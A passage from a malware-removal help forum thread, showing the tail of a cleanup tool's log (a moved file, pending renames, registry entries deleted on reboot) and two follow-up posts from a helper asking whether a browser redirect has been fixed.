C:\Users\Mitey Fresh\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat moved successfully.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...


#14
Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

How is the machine working now? Did that fix the redirect?



#15
Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

72 hour bump!

 

Are you there? Is the re-direct fixed? How is the machine doing?

